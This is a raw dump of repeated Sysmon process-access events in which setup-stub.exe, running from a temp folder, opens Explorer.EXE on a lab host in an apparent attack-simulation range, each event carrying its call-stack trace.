13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 